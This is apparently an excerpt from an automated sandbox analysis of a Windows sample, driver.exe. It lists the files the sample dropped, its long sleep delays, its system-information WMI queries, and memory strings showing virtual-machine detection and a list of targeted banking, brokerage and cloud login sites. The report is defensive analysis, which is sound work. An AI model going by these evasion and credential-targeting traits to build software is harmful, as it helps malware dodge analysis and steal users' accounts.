              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\driver.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17566
              Source: C:\Users\user\Desktop\driver.exeAPI coverage: 6.0 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep count: 6258 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep count: 292 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6388Thread sleep count: 6357 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1120Thread sleep count: 474 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7176Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 6117 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3712Thread sleep count: 203 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep count: 1343 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7900Thread sleep count: 5057 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 2549 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652Thread sleep time: -19369081277395017s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7692Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\SIHClient.exe TID: 8092Thread sleep time: -90000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412Thread sleep count: 3381 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516Thread sleep count: 1821 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 4302 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep count: 229 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5432Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472Thread sleep count: 2594 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep count: 891 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 3076 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 1443 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\PING.EXELast function: Thread delayed
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF6A29B83B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,0_2_00007FF6A29B92F0
              Source: C:\Users\user\Desktop\driver.exeCode function: 0_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF6A29D18E4
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B92F0 FindFirstFileExW,FindClose,2_2_00007FF6A29B92F0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6A29B83B0
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF6A29D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6A29D18E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542646EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,77_2_00007FF7542646EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF7542A88E0 FindFirstFileExA,77_2_00007FF7542A88E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,77_2_00007FF75425E21C
              Source: C:\Users\user\Desktop\driver.exeCode function: 2_2_00007FF8A8661240 GetSystemInfo,2_2_00007FF8A8661240
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 1*fecodevmusrvc
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: svchost.exe, 00000030.00000002.3296783484.000002106B658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000030.00000002.3294657376.000002106602B000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E08000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2218706079.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000002.2497855608.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000003.2220783237.00000224C5264000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000040.00000002.2497855608.00000224C5213000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: driver.exe, 00000002.00000002.2439604035.000001C0EDF90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~Y
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d8qemu-ga
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f1vmware
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: rar.exe, 0000004D.00000003.2348866044.0000014AD2546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: rar.exe, 0000004D.00000003.2348866044.0000014AD2546000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000003B.00000002.2187892505.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185038981.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2186016185.0000025388E14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"*Yx
              Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Qf4vmsrvc
              Source: driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: driver.exe, 00000002.00000002.2444747899.000001C0EF470000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2329743274.000001C0EEECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: driver.exe, 00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp, driver.exe, 00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E08000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VmOW
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185838643.0000025388E30000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: driver.exe, 00000002.00000003.2329743274.000001C0EEF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: getmac.exe, 0000003B.00000003.2185038981.0000025388E14000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000003.2185838643.0000025388E30000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000003B.00000002.2187892505.0000025388E33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
